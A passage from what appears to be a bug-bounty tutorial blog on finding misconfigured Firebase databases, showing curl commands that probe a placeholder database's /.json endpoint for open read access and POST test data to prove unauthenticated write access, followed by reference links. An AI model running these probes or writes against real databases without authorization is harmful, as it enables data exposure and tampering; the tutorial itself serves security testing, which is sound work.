<p><a class="glightbox" href="../../assets/firebase_link.webp" data-type="image" data-width="auto" data-height="auto" data-desc-position="bottom"><img alt="Open Lightbox" class="glightbox center" src="../../assets/firebase_link.webp" width="700" /></a></p>
<hr />
<h3 id="6-check-for-vulnerability">6. Check for Vulnerability</h3>
<p>Append <code>/.json</code> to the Firebase URL:</p>
<div class="language-bash highlight"><pre><span></span><code><span id="__span-5-1"><a id="__codelineno-5-1" name="__codelineno-5-1" href="#__codelineno-5-1"></a>curl<span class="w"> </span>-X<span class="w"> </span>GET<span class="w"> </span>https://somefirebase-database.firebaseio.com/.json
</span></code></pre></div>
<ul>
<li>If it returns <strong>data or <code>null</code></strong>, it’s vulnerable ✅</li>
<li>If it returns <strong>“Permission denied”</strong>, it’s safe ❌</li>
</ul>
<p><a class="glightbox" href="../../assets/permission_denied.webp" data-type="image" data-width="auto" data-height="auto" data-desc-position="bottom"><img alt="Open Lightbox" class="glightbox center" src="../../assets/permission_denied.webp" width="700" /></a></p>
<hr />
<h3 id="7-exploit-the-firebase-db">7. Exploit the Firebase DB</h3>
<p>Let’s try adding data via a POST request:</p>
<div class="language-bash highlight"><pre><span></span><code><span id="__span-6-1"><a id="__codelineno-6-1" name="__codelineno-6-1" href="#__codelineno-6-1"></a>curl<span class="w"> </span>-X<span class="w"> </span>POST<span class="w"> </span>https://somefirebase-database.firebaseio.com/testing1.json<span class="w"> </span><span class="se">\</span>
</span><span id="__span-6-2"><a id="__codelineno-6-2" name="__codelineno-6-2" href="#__codelineno-6-2"></a>-d<span class="w"> </span><span class="s1">&#39;{&quot;cat&quot;: &quot;meow&quot;, &quot;dog&quot;: &quot;bowbow&quot;}&#39;</span>
</span></code></pre></div>
<p>Now visit:</p>
<div class="language-text highlight"><table class="highlighttable"><tr><td class="linenos"><div class="linenodiv"><pre><span></span><span class="normal"><a href="#__codelineno-7-1">1</a></span></pre></div></td><td class="code"><div><pre><span></span><code><span id="__span-7-1"><a id="__codelineno-7-1" name="__codelineno-7-1"></a>https://somefirebase-database.firebaseio.com/testing1.json
</span></code></pre></div></td></tr></table></div>
<p>You should see something like:</p>
<div class="language-json highlight"><table class="highlighttable"><tr><td class="linenos"><div class="linenodiv"><pre><span></span><span class="normal"><a href="#__codelineno-8-1">1</a></span>
<span class="normal"><a href="#__codelineno-8-2">2</a></span>
<span class="normal"><a href="#__codelineno-8-3">3</a></span>
<span class="normal"><a href="#__codelineno-8-4">4</a></span></pre></div></td><td class="code"><div><pre><span></span><code><span id="__span-8-1"><a id="__codelineno-8-1" name="__codelineno-8-1"></a><span class="p">{</span>
</span><span id="__span-8-2"><a id="__codelineno-8-2" name="__codelineno-8-2"></a><span class="w">  </span><span class="nt">&quot;cat&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;meow&quot;</span><span class="p">,</span>
</span><span id="__span-8-3"><a id="__codelineno-8-3" name="__codelineno-8-3"></a><span class="w">  </span><span class="nt">&quot;dog&quot;</span><span class="p">:</span><span class="w"> </span><span class="s2">&quot;bowbow&quot;</span>
</span><span id="__span-8-4"><a id="__codelineno-8-4" name="__codelineno-8-4"></a><span class="p">}</span>
</span></code></pre></div></td></tr></table></div>
<p><a class="glightbox" href="../../assets/result_firebase.webp" data-type="image" data-width="auto" data-height="auto" data-desc-position="bottom"><img alt="Open Lightbox" class="glightbox center" src="../../assets/result_firebase.webp" width="700" /></a></p>
<p><a class="glightbox" href="../../assets/heheboy_firebase.gif" data-type="image" data-width="auto" data-height="auto" data-desc-position="bottom"><img alt="Open Lightbox" class="glightbox center" src="../../assets/heheboy_firebase.gif" width="550" /></a></p>
<div class="language-text highlight"><pre><span></span><code>                                Thank me later 😆
</code></pre></div>
<hr />
<h2 id="final-thoughts">Final Thoughts</h2>
<p>I hope this post helped you understand how to find <strong>Insecure Firebase Enums</strong>.</p>
<p>If you’re interested, check out more articles/blogs related to Firebase misconfigurations and Android app security.</p>
<p>Happy Hunting! 🎯</p>
<p><a href="https://cloud.hacktricks.wiki/en/pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html">GCP - Firebase Enum</a></p>
<p><a href="https://danangtriatmaja.medium.com/firebase-database-takover-b7929bbb62e1">Firebase Database Takover</a></p>
<p><a href="https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty/?source=post_page-----42b79e9b76f8---------------------------------------">Exploiting Insecure Firebase Database!</a></p>
<p><a href="https://hackerone.com/reports/684099?source=post_page-----42b79e9b76f8---------------------------------------">X (Formerly Twitter) disclosed on HackerOne: Periscope-all Firebase</a></p>
<hr />












                
              </article>
            </div>
          
          
<script>var target=document.getElementById(location.hash.slice(1));target&&target.name&&(target.checked=target.name.startsWith("__tabbed_"))</script>
        </div>
        
      </main>
      
        <footer class="md-footer">
  
    
      
      <nav class="md-footer__inner md-grid" aria-label="Footer" >
        
          
          <a href="../.." class="md-footer__link md-footer__link--prev" aria-label="Previous: Home">
            <div class="md-footer__button md-icon">
              
              <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11z"/></svg>
            </div>
            <div class="md-footer__title">
              <span class="md-footer__direction">
                Previous
              </span>
              <div class="md-ellipsis">
                Home
              </div>
            </div>
          </a>
        
        
          
          <a href="../EXPLOIT_SECURITY_IoT_CTF/" class="md-footer__link md-footer__link--next" aria-label="Next: Exploit Security IOT CTF">
            <div class="md-footer__title">
              <span class="md-footer__direction">
                Next
              </span>
              <div class="md-ellipsis">
                Exploit Security IOT CTF
              </div>
            </div>
            <div class="md-footer__button md-icon">
              
              <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M4 11v2h12l-5.5 5.5 1.42 1.42L19.84 12l-7.92-7.92L10.5 5.5 16 11z"/></svg>
            </div>
          </a>
        
      </nav>
    
  
  <div class="md-footer-meta md-typeset">
    <div class="md-footer-meta__inner md-grid">
      <div class="md-copyright">
  
  
    Made with
    <a href="https://squidfunk.github.io/mkdocs-material/" target="_blank" rel="noopener">
      Material for MkDocs
    </a>
  
</div>
      
    </div>
  </div>
</footer>
      
    </div>
    <div class="md-dialog" data-md-component="dialog">
      <div class="md-dialog__inner md-typeset"></div>
    </div>
    
    
    
      
      <script id="__config" type="application/json">{"base": "../..", "features": ["navigation.footer"], "search": "../../assets/javascripts/workers/search.d50fe291.min.js", "tags": null, "translations": {"clipboard.copied": "Copied to clipboard", "clipboard.copy": "Copy to clipboard", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.placeholder": "Type to start searching", "search.result.term.missing": "Missing", "select.version": "Select version"}, "version": null}</script>
    
    
      <script src="../../assets/javascripts/bundle.56ea9cef.min.js"></script>
      
    
  <script id="init-glightbox">const lightbox = GLightbox({"touchNavigation": true, "loop": false, "zoomable": true, "draggable": true, "openEffect": "zoom", "closeEffect": "zoom", "slideEffect": "slide"});
document$.subscribe(() => { lightbox.reload() });
</script></body>
</html>